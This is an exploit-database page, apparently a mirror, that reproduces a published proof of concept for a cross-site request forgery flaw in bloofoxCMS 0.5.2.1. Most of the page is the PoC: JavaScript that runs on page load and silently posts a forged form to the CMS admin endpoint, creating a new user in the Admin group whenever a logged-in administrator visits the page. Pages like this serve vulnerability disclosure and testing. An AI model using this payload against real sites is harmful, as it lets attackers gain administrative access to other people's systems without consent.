Advertisement






bloofoxCMS 0.5.2.1 CSRF (Add user)

CVE Category Price Severity
CVE-XXXX-XXXX CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-02-05
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020011

Below is a copy:

bloofoxCMS 0.5.2.1 CSRF (Add user)
# Title: bloofoxCMS 0.5.2.1 - CSRF (Add user)
# Exploit Author: LiPeiYi
# Date: 2020-12-18
# Vendor Homepage: https://www.bloofox.com/
# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
# Version: 0.5.1.0 -.5.2.1
# Tested on: windows 10

#Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site

###PoC
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='username' value='testuser01' />";
fields += " <input type='hidden' name='password' value='testpw123' />";  
fields += " <input type='hidden' name='pwdconfirm' value='testpw123' />";  
fields += "<input type='hidden' name='3' value='Admin' />";  
fields += " <input type='hidden' name='blocked' value='0' />";  
fields += "<input type='hidden' name='deleted' value='0' />";  
fields += "<input type='hidden' name='status' value='1' />";  
fields += "<input type='hidden' name='login_page' value='0' />";  
fields += "<input type='hidden' name='send' value='Add+User' />";  


var url = "http://test.com/admin/index.php?mode=user&action=new&submit=send";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>

</body>
</html>


exp detailhttps://github.com/alexlang24/bloofoxCMS/issues/4

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum